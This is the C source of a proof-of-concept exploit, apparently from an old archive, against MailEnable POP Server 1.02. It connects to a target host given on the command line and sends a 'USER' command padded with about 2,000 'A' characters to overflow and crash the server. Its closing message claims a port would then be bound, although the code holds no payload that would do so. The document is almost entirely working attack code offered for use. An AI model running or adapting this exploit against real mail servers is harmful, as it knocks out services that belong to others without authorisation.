home *** CD-ROM | disk | FTP | other *** search
- /*
- *
- * Written by redsand
- * <redsand@redsand.net>
- * Vuln. date found: November 18. 2002
- * Vulnerable: Windows 9x/NT/XP MailEnable POP Server Version 1.02
- *
- * Usage: ./mailenable-dos.1.3 <host> [port] [port] is optional. default is in the #define (port 110)
- * Need to Enable [offset] in final release.
- *
- * Proof of Concept code (PoC)
- *
- */
-
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <errno.h>
- #include <string.h>
- #include <netdb.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <sys/socket.h>
-
- #define PORT 110
-
- char string[2010];
- char death[2500];
- char top[5], end[50];
- char tag[] = "::redsand.net::";
-
- int main(int argc, char *argv[]) {
-
- int sockfd, port, i;
- char buf[2500];
- struct hostent *ha;
- struct sockaddr_in sa;
- if (argc < 2 ) {
- printf("MailEnable POP Server Version 1.02 DoS\n:: redsand <at> redsand.net\r\nUsage: %s <host> <port>\n", argv[0]);
- exit(0);
- }
- if (argv[2]) {
- port = atoi(argv[2]);
- } else { port = PORT; }
- for( i = 0; i <2009; i++) {
- string[i] = 'A';
- }
-
- strcpy(top,"USER ");
- strcpy(end,tag);
- strcpy(death,top);
- strcat(death,string);
- strcat(death,end);
-
- if (!(ha = gethostbyname (argv[1])))
- perror ("gethostbyname");
-
- bzero (&sa, sizeof (sa));
- bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
- sa.sin_family = ha->h_addrtype;
- sa.sin_port = htons (port);
-
- if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
- perror ("socket");
- exit (1);
- }
- printf("MailEnable :: redsand <at> redsand.net\r\n+ connecting...\n");
- if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
- perror ("connect");
- exit (1);
- }
- printf("+ connected\n+ sending request to pop3 server\n");
- send(sockfd, death, sizeof(death), 0);
- // read(sockfd, buf, 2050, 0);
- close(sockfd);
- printf("+ finished\n");
- printf("\r\rIf exploit worked, then it should bind port on 3879\n");
- }
-
- /* redsand.net */
-
